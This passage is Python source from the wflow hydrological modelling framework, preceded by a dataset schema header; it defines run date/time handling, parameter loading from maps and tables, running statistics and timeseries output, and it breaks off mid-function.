text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
"""
wf_DynamicFramework
-------------------
This is a replacement for the standard pcraster/python DynamicFramwork class.\
It provides extra functionality to simplify linking the models build in the framework
with other models. The provided functionality allows external programs to control
and interrogate the model.
"""
# TODO: Remove command-line options from models such as -F that is now in the ini
# TODO: Fix timestep not forewarding in BMI runs (for reading writing maps)
import calendar
import configparser
import csv
import datetime
import glob
import logging
import shutil
import traceback
from collections import namedtuple
from functools import reduce
import numpy as np
from wflow.wf_netcdfio import *
import pcraster as pcr
import pcraster.framework
from wflow import pcrut
from wflow import wflow_adapt
from wflow.wflow_lib import *
from wflow import __version__
import time # last to prevent clobbering by *
def log_uncaught_exceptions(ex_cls, ex, tb):
    """Log an uncaught exception's traceback and message via the module logger."""
    global logging
    trace = "".join(traceback.format_tb(tb))
    logging.error(trace)
    logging.error("{0}: {1}".format(ex_cls, ex))
# Route all uncaught exceptions through the logging system so they end up in
# the model log file as well as on the console.
sys.excepthook = log_uncaught_exceptions
# Attach a do-nothing handler so library-level logging calls never trigger a
# "no handlers could be found" warning.
logging.getLogger("foo").addHandler(logging.NullHandler())
class runDateTimeInfo:
    """
    Class to maintain and retrieve date/time info of the model run.

    In order to support different views on date/time the class supports both a
    "steps" mode (each input time is a timestep) and an "intervals" mode (each
    model timestep is the interval between two input timesteps).
    """

    def __init__(
        self,
        datetimestart=dt.datetime(1990, 1, 1),
        datetimeend=dt.datetime(1990, 1, 5),
        timestepsecs=86400,
        mode="steps",
    ):
        """
        :param datetimestart: date/time of the first input timestep
        :param datetimeend: date/time of the last input timestep
        :param timestepsecs: timestep length in seconds
        :param mode: "steps" or "intervals" (see class docstring)
        """
        self.runStartTime = datetimestart
        self.runEndTime = datetimeend
        self.timeStepSecs = timestepsecs
        self.currentTimeStep = 0
        self.lastTimeStep = 0
        # Bookkeeping flags: set by update() when the start (or start and end)
        # of the run had to be shifted.
        self.startadjusted = 0
        self.startendadjusted = 0
        self.currentmode = mode
        # Number of calls made to update() (debug aid).
        self.callstopupdate = 0

        # runStateTime is the date/time the model state refers to; in "steps"
        # mode it lies one timestep before the start of the run.
        if mode == "steps":
            self.runStateTime = self.runStartTime - datetime.timedelta(
                seconds=self.timeStepSecs
            )
        else:
            self.runStateTime = self.runStartTime

        # Becomes True once a BMI call has (re)configured this object.
        self.setByBMI = False
        self.currentDateTime = self.runStateTime
        # Date/time of the first timestep for which output is produced.
        self.outPutStartTime = self.runStateTime + datetime.timedelta(
            seconds=self.timeStepSecs
        )
        # NOTE(review): true division makes runTimeSteps a float in Python 3;
        # consumers cast with int() where an actual step count is needed.
        self.runTimeSteps = (
            calendar.timegm(self.runEndTime.utctimetuple())
            - calendar.timegm(self.runStateTime.utctimetuple())
        ) / self.timeStepSecs
        # Convenience attributes derived from the current date/time.
        self.currentMonth = self.currentDateTime.month
        self.currentYday = self.currentDateTime.timetuple().tm_yday
        self.currentHour = self.currentDateTime.hour
        self.nextDateTime = self.currentDateTime + datetime.timedelta(
            seconds=self.timeStepSecs
        )
        self.lastTimeStep = self.runTimeSteps + self.currentTimeStep

    def __str__(self):
        """Return a string dump of all attributes (debug aid)."""
        a = self.__dict__
        return str(a)

    def update(
        self,
        timestepsecs=None,
        datetimestart=None,
        datetimeend=None,
        currentTimeStep=None,
        currentDatetime=None,
        runTimeSteps=None,
        mode="steps",
        incrementStep=False,
        setByBMI=False,
    ):
        """
        Updates the content of the framework date/time object.

        Use only one input parameter per call, except runTimeSteps and
        datetimestart which may be given together. Use the mode option to
        switch between steps and intervals ('steps' or 'intervals').

        :param timestepsecs: new timestep length in seconds
        :param datetimestart: date/time of the start of the input data
        :param datetimeend: date/time of the end of the run
        :param currentTimeStep: (1-based) timestep to jump to
        :param currentDatetime: date/time to jump to
        :param runTimeSteps: total number of timesteps of the run
        :param mode: 'steps' or 'intervals'
        :param incrementStep: if True advance the run by one timestep
        :param setByBMI: mark this update as originating from a BMI call
        :return: nothing
        """
        self.currentmode = mode
        self.callstopupdate = self.callstopupdate + 1

        if setByBMI:
            self.setByBMI = True

        # A new timestep length without a step count: recompute the number of
        # steps from the (unchanged) start/end times.
        if timestepsecs and not runTimeSteps:
            self.timeStepSecs = timestepsecs
            self.runTimeSteps = (
                calendar.timegm(self.runEndTime.utctimetuple())
                - calendar.timegm(self.runStateTime.utctimetuple())
            ) / self.timeStepSecs
            if self.currentmode == "steps":
                self.runStateTime = self.runStartTime - datetime.timedelta(
                    seconds=self.timeStepSecs
                )
            self.outPutStartTime = self.runStateTime + datetime.timedelta(
                seconds=self.timeStepSecs
            )
        elif timestepsecs and runTimeSteps:
            # Both given: take them as-is.
            self.timeStepSecs = timestepsecs
            self.runTimeSteps = runTimeSteps

        # A new start time resets the run to step 1.
        if datetimestart:
            self.currentTimeStep = 1
            # if self.startadjusted
            if self.currentmode == "steps":
                self.runStartTime = datetimestart
                self.startadjusted = 0
                self.runStateTime = self.runStartTime - datetime.timedelta(
                    seconds=self.timeStepSecs
                )
            else:
                # self.runStartTime = datetimestart + datetime.timedelta(seconds=self.timeStepSecs)
                self.runStartTime = (
                    datetimestart
                )  # + datetime.timedelta(seconds=self.timeStepSecs)
                self.startadjusted = 1
                self.runStateTime = (
                    self.runStartTime
                )  # - datetime.timedelta(seconds=self.timeStepSecs)
            self.currentDateTime = self.runStateTime
            self.outPutStartTime = self.currentDateTime + datetime.timedelta(
                seconds=self.timeStepSecs
            )
            self.runTimeSteps = (
                calendar.timegm(self.runEndTime.utctimetuple())
                - calendar.timegm(self.runStateTime.utctimetuple())
            ) / self.timeStepSecs
            if self.runTimeSteps < 1:  # End time before start time
                # Force a one-step run and move the end accordingly.
                self.runTimeSteps = 1
                self.runEndTime = self.runStateTime + datetime.timedelta(
                    seconds=self.timeStepSecs * self.runTimeSteps
                )

        # Start time plus an explicit number of steps: derive the end time.
        if datetimestart and runTimeSteps:
            self.currentTimeStep = 1
            self.currentDateTime = self.runStartTime
            if self.currentmode == "steps":
                self.runStartTime = datetimestart
                self.startadjusted = 0
                self.runStateTime = self.runStartTime - datetime.timedelta(
                    seconds=self.timeStepSecs
                )
            else:
                self.runStartTime = (
                    datetimestart
                )  # + datetime.timedelta(seconds=self.timeStepSecs)
                self.startadjusted = 1
                self.runStateTime = self.runStartTime
            self.outPutStartTime = self.runStateTime + datetime.timedelta(
                seconds=self.timeStepSecs
            )
            self.currentDateTime = self.runStartTime
            self.runEndTime = self.runStateTime + datetime.timedelta(
                seconds=self.timeStepSecs * runTimeSteps
            )

        # A new end time: recompute the number of steps.
        if datetimeend:
            self.runEndTime = datetimeend
            self.runTimeSteps = (
                calendar.timegm(self.runEndTime.utctimetuple())
                - calendar.timegm(self.runStateTime.utctimetuple())
            ) / self.timeStepSecs
            if self.runTimeSteps < 1:  # End time before start time
                # Force a one-step run and move the start back accordingly.
                self.runTimeSteps = 1
                self.runStartTime = self.runEndTime - datetime.timedelta(
                    seconds=self.timeStepSecs * self.runTimeSteps
                )

        # Jump to an explicit (1-based) timestep.
        if currentTimeStep and currentTimeStep != self.currentTimeStep:
            self.currentTimeStep = currentTimeStep
            self.currentDateTime = self.runStateTime + datetime.timedelta(
                seconds=self.timeStepSecs * (self.currentTimeStep - 1)
            )

        # Advance the run by exactly one step.
        if incrementStep:
            self.currentTimeStep = self.currentTimeStep + 1
            self.currentDateTime = self.currentDateTime + datetime.timedelta(
                seconds=self.timeStepSecs
            )

        # Jump to an explicit date/time; derive the matching step number.
        if currentDatetime:
            self.currentDateTime = currentDatetime
            self.currentTimeStep = (
                calendar.timegm(self.currentDateTime.utctimetuple())
                - calendar.timegm(self.runStateTime.utctimetuple())
            ) / self.timeStepSecs + 1

        # Refresh all derived convenience attributes.
        self.nextDateTime = self.currentDateTime + datetime.timedelta(
            seconds=self.timeStepSecs
        )
        self.lastTimeStep = self.runTimeSteps
        self.currentMonth = self.currentDateTime.month
        self.currentYday = self.currentDateTime.timetuple().tm_yday
        self.currentHour = self.currentDateTime.hour
class wf_exchnageVariables:
    """
    List of exchange variables

    The style determined how they are used
    - 1: read from file like normal
    - 2: set by the api in mem (for consistency this is style 0 in the ini file)
    """

    def __init__(self):
        # Each entry is a [name, role, unit] triple.
        self.vars = []

    def varexists(self, name):
        """Return 1 if a variable with this name is registered, else 0."""
        return 1 if any(entry[0] == name for entry in self.vars) else 0

    def addvar(self, name, role, unit):
        """
        Register an exchange variable, translating a numeric unit code to a
        unit string; unknown codes are stored unchanged.
        """
        if self.varexists(name):
            return
        unitnames = {
            "0": "mm/timestep",
            "1": "m^3/sec",
            "2": "ma",
            "3": "degree Celcius",
            "4": "mm",
            "5": "-",
        }
        self.vars.append([name, role, unitnames.get(unit, unit)])

    def getvars(self):
        """Return the full list of [name, role, unit] entries."""
        return self.vars

    def getvarStyle(self, name):
        """
        returns 2 if this is a input variable to be set from api otherwise 1
        ( in the ini 0 is for in memory variables)
        A bit confusing!!!
        """
        for entry in self.vars:
            if name in entry:
                return 2 if entry[1] == 0 else 1
        return 1
class wf_online_stats:
    def __init__(self):
        """
        Container for running (online) statistics, one entry per variable name.
        All attributes are dicts keyed by the variable name given to addstat().
        """
        self.count = {}
        self.rangecount = {}
        self.result = {}
        self.mode = {}
        self.points = {}
        self.filename = {}
        self.statvarname = {}

    def addstat(self, name, mode="mean", points=30, filename=None):
        """
        Register a statistic for *name*.

        :param name: variable name to track
        :param mode: statistic kind (currently only "mean" is computed)
        :param points: window size used by the running mean
        :param filename: optional output file name
        :return: nothing
        """
        self.statvarname[name] = "_".join([name, mode, str(points)])
        self.mode[name] = mode
        self.points[name] = points
        self.count[name] = 0
        self.rangecount[name] = 0
        self.filename[name] = filename

    def getstat(self, data, name):
        """
        Feed one value for *name* and return the updated running statistic
        as a pcraster scalar map.

        :param data: new value (pcraster map)
        :param name: variable name registered via addstat()
        :return: pcr.scalar of the running result
        """
        if self.count[name] == 0:
            # First value simply initialises the result.
            self.result[name] = data
        elif self.mode[name] == "mean":
            npoints = self.points[name]
            # Exponential-style running mean over ``npoints`` samples.
            self.result[name] = (
                self.result[name] * (npoints - 1) / npoints + data / npoints
            )
        self.count[name] += 1
        return pcr.scalar(self.result[name])
class wf_sumavg:
    def __init__(self, varname, mode="sum", filename=None):
        """
        Class to hold a variable in the usermodel that must be summed,
        averaged, min'ed or max'ed over the run.

        :param varname: name of the variable in the user model
        :param mode: one of "sum", "avg", "min", "max" (see availtypes)
        :param filename: output file name; defaults to varname
        """
        if filename is None:  # idiomatic None test (was ``== None``)
            filename = varname

        self.mode = mode
        self.varname = varname
        self.filename = filename
        self.data = []
        self.count = 0
        self.result = []
        self.availtypes = ["sum", "avg", "min", "max"]

    def add_one(self, data):
        """
        Add a map (one timestep) to the running aggregate.
        """
        if self.count == 0:
            # The first value initialises the aggregate for every mode.
            self.data = data
        else:
            if self.mode == "sum" or self.mode == "avg":
                self.data = self.data + data
            if self.mode == "max":
                self.data = pcr.max(self.data, data)
            if self.mode == "min":
                self.data = pcr.min(self.data, data)
        self.count = self.count + 1

    def finalise(self):
        """
        Perform final calculations if needed (average, etc) and assign to the
        result variable
        """
        # Only finalise spatial (pcraster) data; otherwise result stays [].
        if hasattr(self.data, "isSpatial"):
            if self.mode == "sum" or self.mode == "min" or self.mode == "max":
                self.result = self.data
            if self.mode == "avg":
                self.result = self.data / self.count
class wf_OutputTimeSeriesArea:
    def __init__(self, area, oformat="csv", areafunction="average", tformat="steps"):
        """
        Replacement timeseries output function for the pcraster framework

        area - an area-map to average from
        oformat - format of the output file (csv, txt, tss, only csv and tss at the moment)
        areafunction - aggregation applied per area (average, total, minimum,
                       maximum, majority)
        tformat - steps or datetime (format of the timesteps/stamp column)

        Step 1: make average of variable using the areaverage function
        Step 2: Sample the values from the areas (remember the index so we can do it faster lateron)
        step 3: store them in order
        """
        self.steps = 0  # number of timesteps written so far
        self.timeformat = tformat
        self.area = area
        self.areanp = pcr.pcr2numpy(area, 0).copy()
        self.oformat = oformat
        self.areafunction = areafunction
        """ average, total, minimum, maximum, majority"""
        # Unique area ids plus the flat index of their first occurrence; the
        # indices are reused every timestep to sample the aggregated map fast.
        self.flatarea, self.idx = np.unique(self.areanp, return_index=True)
        # print self.flatarea
        # self.flatarea = self.flatarea[np.isfinite(self.flatarea)]
        # self.idx = self.idx[np.isfinite(self.flatarea)]
        # Three parallel lists: filename, csv writer and file object per output.
        self.fnamelist = []
        self.writer = []
        self.ofile = []

    def closeall(self):
        """
        Close all open filepointers
        """
        for fp in self.ofile:
            fp.close()
        # Forget the closed files so they can be reopened later if needed.
        self.fnamelist = []
        self.writer = []
        self.ofile = []

    def writestep(self, variable, fname, timestep=None, dtobj=None):
        """
        write a single timestep

        variable - pcraster map to save to tss
        fname - name of the timeseries file
        timestep - optional explicit timestep number for the first column
        dtobj - optional datetime object used for the first column when
                tformat is "datetime"
        """
        # Add new file if not already present
        if fname not in self.fnamelist:
            bufsize = 1  # Implies line buffered
            self.fnamelist.append(fname)
            self.ofile.append(open(fname, "w", bufsize, newline="\n"))
            if self.oformat == "csv":  # Always the case
                self.writer.append(csv.writer(self.ofile[-1]))
                self.ofile[-1].write("# Timestep,")
                self.writer[-1].writerow(self.flatarea)
            elif self.oformat == "tss":  # test
                # PCRaster tss header: description, column count, column names.
                self.writer.append(csv.writer(self.ofile[-1], delimiter=" "))
                self.ofile[-1].write("timeseries scalar\n")
                self.ofile[-1].write(str(len(self.flatarea) + 1) + "\n")
                self.ofile[-1].write("timestep\n")
                for idd in self.flatarea:
                    self.ofile[-1].write(str(idd) + "\n")
            else:
                print("Not implemented yet")

        self.steps = self.steps + 1
        tmpvar = pcr.spatial(pcr.scalar(variable))
        # Aggregate the variable over the area map with the chosen function;
        # unknown function names fall back to areaaverage.
        if self.areafunction == "average":
            self.resmap = pcr.areaaverage(tmpvar, pcr.nominal(self.area))
        elif self.areafunction == "total":
            self.resmap = pcr.areatotal(tmpvar, pcr.nominal(self.area))
        elif self.areafunction == "maximum":
            self.resmap = pcr.areamaximum(tmpvar, pcr.nominal(self.area))
        elif self.areafunction == "minimum":
            self.resmap = pcr.areaminimum(tmpvar, pcr.nominal(self.area))
        elif self.areafunction == "majority":
            self.resmap = pcr.areamajority(tmpvar, pcr.nominal(self.area))
        else:
            self.resmap = pcr.areaaverage(tmpvar, pcr.nominal(self.area))

        # Sample one value per unique area id using the precomputed indices.
        self.remap_np = pcr.pcr2numpy(self.resmap, 0)
        self.flatres = self.remap_np.flatten()[self.idx]
        thiswriter = self.fnamelist.index(fname)
        # First column: datetime stamp, explicit timestep, or internal counter.
        if dtobj and self.timeformat == "datetime":
            self.writer[thiswriter].writerow([str(dtobj)] + self.flatres.tolist())
        elif timestep:
            self.writer[thiswriter].writerow([timestep] + self.flatres.tolist())
        else:
            self.writer[thiswriter].writerow([self.steps] + self.flatres.tolist())
        # self.flatres = np.insert(self.flatres,0,self.steps)
class wf_DynamicFramework(pcraster.framework.frameworkBase.FrameworkBase):
## \brief Constructor
#
# \param userModel class containing the user model
# \param lastTimeStep last timestep to run
# \param firstTimestep sets the starting timestep of the model (optional,
# default is 1)
#
def __init__(
    self,
    userModel,
    lastTimeStep=0,
    firstTimestep=1,
    datetimestart=dt.datetime(1990, 1, 1),
    timestepsecs=86400,
):
    """
    Construct the framework around the given user model.

    :param userModel: class containing the user model
    :param lastTimeStep: last timestep to run
    :param firstTimestep: starting timestep of the model (optional, default 1)
    :param datetimestart: date/time of the first timestep
    :param timestepsecs: timestep length in seconds
    """
    pcraster.framework.frameworkBase.FrameworkBase.__init__(self)

    # Record layout for one model parameter as declared in the ini/model.
    self.ParamType = namedtuple(
        "ParamType", "name stack type default verbose lookupmaps"
    )
    self.modelparameters = []  # list of model parameters
    self.modelparameters_changes_once = {}
    self.modelparameters_changes_timestep = {}
    self.exchnageitems = wf_exchnageVariables()
    self.setQuiet(True)
    self.reinit = 0
    self._d_model = userModel
    self._testRequirements()

    # Derive the run end date/time from the number of steps requested.
    dte = datetimestart + datetime.timedelta(
        seconds=(lastTimeStep - firstTimestep) * timestepsecs
    )
    self.DT = runDateTimeInfo(
        timestepsecs=timestepsecs,
        datetimestart=datetimestart,
        datetimeend=dte,
        mode="steps",
    )

    if lastTimeStep != 0:
        if firstTimestep == 0:
            firstTimestep = 1
        self.DT.update(runTimeSteps=(lastTimeStep - firstTimestep))
        self.DT.update(currentTimeStep=firstTimestep - 1)

    self.setviaAPI = {}
    # Flag for each variable. If 1 it is set by the API before this timestep. Reset is done at the end of each timestep

    if firstTimestep > lastTimeStep:
        msg = (
            "Cannot run dynamic framework: Start timestep smaller than end timestep"
        )
        raise pcraster.framework.frameworkBase.FrameworkError(msg)

    # fttb
    # Expose the framework helper functions as methods on the user model.
    self._addMethodToClass(self._readmapNew)
    self._addMethodToClass(self._reportNew)
    self._addMethodToClass(self.wf_suspend)
    self._addMethodToClass(self.wf_resume)
    self._addMethodToClass(self.wf_readmap)
    self._addMethodToClass(self.wf_multparameters)
    self._addMethodToClass(self.wf_readmapClimatology)
    self._addMethodToClass(self.readtblDefault)
    self._addMethodToClass(self.readtblLayersDefault)
    self._addMethodToClass(self.readtblFlexDefault)
    self._addMethodToClass(self.wf_supplyVariableNamesAndRoles)
    self._addMethodToClass(self.wf_updateparameters)
    self._addMethodToClass(self.wf_savesummarymaps)
    self._addMethodToClass(self.wf_supplyStartTimeDOY)
    self._addMethodToClass(self.wf_supplyStartTime)
    self._addMethodToClass(self.wf_supplyJulianDOY)
    self._addMethodToClass(self.wf_supplyStartDateTime)
    self._addMethodToClass(self.wf_supplyCurrentDateTime)
    self._addMethodToClass(self.wf_supplyEndTime)

    self._addAttributeToClass("ParamType", self.ParamType)
    self._addAttributeToClass("timestepsecs", self.DT.timeStepSecs)
    self._addAttributeToClass("__version__", __version__)
    # self._addAttributeToClass("__release__", __release__)
    # self._addAttributeToClass("__build__", __build__)

    self.skipfirsttimestep = 0
    if firstTimestep == 0:
        firstTimestep = 1

    # self._userModel()._setNrTimeSteps(lastTimeStep - firstTimestep + 1)
    # self._userModel()._setNrTimeSteps(self.DT.runTimeSteps)
    # self._d_firstTimestep = 1
    # self._userModel()._setFirstTimeStep(1)
    # self._d_lastTimestep = self.DT.runTimeSteps
    # self.APIDebug = 0
    # self._userModel().currentdatetime = self.DT.currentDateTime
    # self._userModel()._setCurrentTimeStep(firstTimestep)
    self._update_time_from_DT()

    # Scalar zero map with the geometry of the current clone map.
    self.TheClone = (
        pcr.scalar(pcr.xcoordinate((pcr.spatial(pcr.boolean(1.0))))) * 0.0
    )
def _update_time_from_DT(self):
    """
    Push the run settings held in self.DT (the runDateTimeInfo object) into
    the pcraster framework bookkeeping and into the user model.

    :return: nothing
    """
    usermodel = self._userModel()
    usermodel._setNrTimeSteps(int(self.DT.runTimeSteps))
    self._d_firstTimestep = 1
    usermodel._setFirstTimeStep(1)
    self._d_lastTimestep = self.DT.runTimeSteps
    self.APIDebug = 0
    usermodel.currentdatetime = self.DT.currentDateTime
    # Step 0 means "before the first step": the framework starts at step 1.
    step = self.DT.currentTimeStep
    usermodel._setCurrentTimeStep(1 if step == 0 else int(step))
    usermodel.timestepsecs = self.DT.timeStepSecs
def wf_multparameters(self):
    """
    Apply multiplication factors from the ini file to model variables.

    Entries in modelparameters_changes_timestep are applied every dynamic
    timestep; entries in modelparameters_changes_once are applied once, in
    the initial section. Each entry maps a "self._userModel().<var>" key to
    a "<expr> * <factor>" string; only the factor after the '*' is used.

    :return: nothing
    """
    if self._userModel()._inDynamic():
        for cmdd in self.modelparameters_changes_timestep:
            # Strip the "self._userModel()." prefix to get the attribute name.
            var = cmdd.replace("self._userModel().", "").strip()
            if not hasattr(self._userModel(), var):
                self.logger.error(
                    "Variable change (apply_timestep) could not be applied to "
                    + str(var)
                )
            else:
                setattr(
                    self._userModel(),
                    var,
                    getattr(self._userModel(), var)
                    * float(
                        self.modelparameters_changes_timestep[cmdd].split("*")[1]
                    ),  # self.modelparameters_changes_timestep[cmdd],
                )
                self.logger.warning(
                    "Variable change (apply_timestep) applied to "
                    + str(var)
                    + " with factor"
                    + self.modelparameters_changes_timestep[cmdd].split("*")[1]
                )

    if self._userModel()._inInitial():
        # import pdb; pdb.set_trace()
        for cmdd in self.modelparameters_changes_once:
            var = cmdd.replace("self._userModel().", "").strip()
            # for List objects in topoflex
            if '[' in var:
                # "name[i]" style: multiply element i of the list attribute.
                listnr = var.split('[')[-1].split(']')[0]
                varname = var.split('[')[0]
                mapmult = getattr(self._userModel(), varname)[int(listnr)] * float(self.modelparameters_changes_once[cmdd].split('*')[1])
                getattr(self._userModel(), varname)[int(listnr)] = mapmult
                self.logger.warning(
                    "Variable change (apply_once) applied to "
                    + str(var) + " with factor" + self.modelparameters_changes_once[cmdd].split('*')[1]
                )
            # for List objects in sbm
            elif var.split('_')[-1].isdigit():
                # "name_i" style: multiply element i of the list attribute.
                mapmult = getattr(self._userModel(), var.split('_')[0])[int(var.split('_')[-1])] * float(self.modelparameters_changes_once[cmdd].split("*")[1])
                getattr(self._userModel(),var.split('_')[0])[int(var.split('_')[-1])] = mapmult
                self.logger.warning(
                    "Variable change (apply_once) applied to "
                    + str(var.split('_')[0]) + str([int(var.split('_')[-1])]) + " with factor" + self.modelparameters_changes_once[cmdd].split('*')[1]
                )
            elif not hasattr(self._userModel(), var):
                self.logger.error(
                    "Variable change (apply_once) could not be applied to "
                    + str(var)
                )
            else:
                # Plain scalar/map attribute: multiply in place.
                setattr(
                    self._userModel(),
                    var,
                    getattr(self._userModel(), var)
                    * float(self.modelparameters_changes_once[cmdd].split("*")[1]),
                )
                self.logger.warning(
                    "Variable change (apply_once) applied to "
                    + str(var)
                    + " with factor"
                    + self.modelparameters_changes_once[cmdd].split("*")[1]
                )
def wf_updateparameters(self):
    """
    Update the model Parameters (can be used in static and dynamic part of the model)

    It does this by looking at the parameters listed in [parameters] section in the
    ini file and those defined in the parameters() function in the actual model
    (defined by the model developer).

    :return nothing:
    """
    for par in self.modelparameters:
        # ---- parameters resolved once, in the initial section ----
        if self._userModel()._inInitial():
            if par.type == "tbl" or par.type == "tblsparse":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Initial: Adding " + par.name + " to model."
                    )
                    tblname = os.path.join(self._userModel().Dir, par.stack)
                    theparmap = self.readtblFlexDefault(
                        tblname, par.default, *par.lookupmaps
                    )
                    setattr(self._userModel(), par.name, theparmap)
            if par.type == "statictbl":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                    tblname = os.path.join(self._userModel().Dir, par.stack)
                    # Classic three-map lookup: landuse, subcatchment, soil.
                    theparmap = self.readtblDefault(
                        tblname,
                        self._userModel().LandUse,
                        self._userModel().TopoId,
                        self._userModel().Soil,
                        par.default,
                    )
                    setattr(self._userModel(), par.name, theparmap)
            if par.type == "staticmap":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                    fname = os.path.join(self._userModel().Dir, par.stack)
                    fileName, fileExtension = os.path.splitext(fname)
                    if fileExtension == ".map":
                        theparmap = self.wf_readmap(
                            fname, par.default, fail=int(par.verbose)
                        )
                    else:
                        self._userModel().logger.error(
                            fname + " Does not have a .map extension"
                        )
                    setattr(self._userModel(), par.name, theparmap)

        # ---- forcing/climatology: refreshed in initial AND every step ----
        if self._userModel()._inDynamic() or self._userModel()._inInitial():
            if par.type == "timeseries":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                theparmap = self.wf_readmap(
                    os.path.join(self._userModel().caseName, par.stack),
                    par.default,
                    verbose=int(par.verbose),
                )
                theparmap = pcr.cover(theparmap, par.default)
                setattr(self._userModel(), par.name, theparmap)
            if par.type == "monthlyclim":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                theparmap = self.wf_readmapClimatology(
                    os.path.join(self._userModel().caseName, par.stack),
                    kind=1,
                    default=par.default,
                    verbose=int(par.verbose),
                )
                theparmap = pcr.cover(theparmap, par.default)
                setattr(self._userModel(), par.name, theparmap)
            if par.type == "tblmonthlyclim":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Initial: Adding " + par.name + " to model."
                    )
                # One table per month: <stack>_<month><ext>.
                month = self.DT.currentDateTime.month
                ptex = os.path.splitext(par.stack)
                newName = ptex[0] + "_" + str(month) + ptex[1]
                tblname = os.path.join(self._userModel().Dir, newName)
                theparmap = self.readtblFlexDefault(
                    tblname, par.default, *par.lookupmaps
                )
                setattr(self._userModel(), par.name, theparmap)
            if par.type == "hourlyclim":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                    print("hourlyclim has " + par.name + par.stack)
                    print("not been implemented yet")
            if par.type == "dailyclim":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        par.name + " is not defined yet, adding anyway."
                    )
                theparmap = self.wf_readmapClimatology(
                    os.path.join(self._userModel().caseName, par.stack),
                    kind=2,
                    default=par.default,
                    verbose=int(par.verbose),
                )
                setattr(self._userModel(), par.name, theparmap)

        # ---- parameters refreshed only while stepping ----
        if self._userModel()._inDynamic():
            if par.type == "tss":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        par.name + " is not defined yet, adding anyway."
                    )
                theparmap = self.wf_timeinputscalar(
                    os.path.join(self._userModel().caseName, par.stack),
                    os.path.join(self._userModel().caseName, par.lookupmaps[0]),
                    par.default,
                )
                setattr(self._userModel(), par.name, theparmap)
            if par.type == "tblts":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                # One table per timestep: <stack>_<currentStep>.
                tblname = os.path.join(
                    self._userModel().Dir,
                    par.stack + "_" + str(self._userModel().currentStep),
                )
                theparmap = self.readtblFlexDefault(
                    tblname, par.default, *par.lookupmaps
                )
                setattr(self._userModel(), par.name, theparmap)
            if par.type == "tblsparse":
                if not hasattr(self._userModel(), par.name):
                    self._userModel().logger.info(
                        "Adding " + par.name + " to model."
                    )
                tblname = os.path.join(
                    self._userModel().Dir,
                    par.stack + "_" + str(self._userModel().currentStep),
                )
                # Only added a new table if available
                if os.path.exists(tblname):
                    theparmap = self.readtblFlexDefault(
                        tblname, par.default, *par.lookupmaps
                    )
                    setattr(self._userModel(), par.name, theparmap)

    # Clear the per-timestep "set via API" flags.
    self.setviaAPI = {}
def wf_supplyStartTimeDOY(self):
    """Return the day-of-year (1-366) of the run start time."""
    return self.DT.runStartTime.utctimetuple().tm_yday
def wf_supplyJulianDOY(self):
    """
    Return the current day-of-year corrected for leap years: in a leap year
    days after day 60 (Feb 29) are shifted back by one so the numbering
    matches a non-leap year.
    """
    doy = self.DT.currentYday
    year = self.DT.currentDateTime.timetuple().tm_year
    if calendar.isleap(year) and doy > 60:
        doy = doy - 1
    return doy
def wf_timeinputscalar(self, tssfile, areamap, default):
    """
    Read the current timestep from a tss file and spread it over the areas.

    :param tssfile: path to the PCRaster tss file
    :param areamap: map whose classes select the tss columns
    :param default: value used to fill cells without a tss value
    :return: tss converted to a map
    """
    classes = pcr.nominal(areamap)
    values = pcr.timeinputscalar(tssfile, classes)
    return pcr.cover(values, default)
def _wf_shutdown(self):
    """
    Finish the run: close the netCDF output (if any), dump the effective
    configuration to configofrun.ini and close all open timeseries files.
    """
    if hasattr(self, "NcOutput"):
        self.NcOutput.finish()

    inifile = os.path.join(
        self._userModel().caseName, self._userModel().runId, "configofrun.ini"
    )
    with open(inifile, "w") as fp:
        self._userModel().config.write(fp)

    for outputter in self.oscv.values():
        outputter.closeall()
def loggingSetUp(
    self, caseName, runId, logfname, model, modelversion, level=pcrut.logging.INFO
):
    """
    Sets up the logging system assuming we are in the runId directory
    """
    logfile = os.path.join(caseName, runId, logfname)
    logger = pcrut.setlogger(logfile, model, thelevel=level)
    banner = "%s %s Case: %s Runid: %s" % (model, modelversion, caseName, runId)
    logger.info(banner)
    return logger
def readtblDefault(self, pathtotbl, landuse, subcatch, soil, default):
    """
    Build a parameter map from a table, a prepared map, or a default value.

    Resolution order:
      1. a prepared map of the same base name in the ``../staticmaps``
         directory next to the table;
      2. the tbl file, looked up against the landuse, subcatchment and
         soil maps;
      3. a uniform map holding the default value.

    Finally check if a tbl file exists with a .mult postfix (e.g.
    Cmax.tbl.mult) and apply the multiplication to the loaded data.

    Input:
        - pathtotbl: full path to table file
        - landuse: landuse map
        - subcatch: subcatchment map
        - soil: soil map
        - default: default value

    Output:
        - map constructed from tbl file or map with default value

    .. todo::

        Add checking for missing values
    """
    basename = os.path.splitext(os.path.basename(pathtotbl))[0]
    mapname = os.path.join(
        os.path.dirname(pathtotbl), "../staticmaps", basename + ".map"
    )

    if os.path.exists(mapname):
        self.logger.info("reading map parameter file: " + mapname)
        rest = pcr.cover(pcr.readmap(mapname), default)
    else:
        if os.path.isfile(pathtotbl):
            rest = pcr.lookupscalar(pathtotbl, landuse, subcatch, soil)
            self.logger.info("Creating map from table: " + pathtotbl)
        else:
            self.logger.warning(
                "tbl file not found ("
                + pathtotbl
                + ") returning default value: "
                + str(default)
            )
            rest = pcr.spatial(pcr.cover(pcr.scalar(default)))

        # Verify that every catchment cell received a value.
        cmask = pcr.ifthen(self._userModel().TopoId > 0, self._userModel().TopoId)
        totalzeromap = pcr.pcr2numpy(
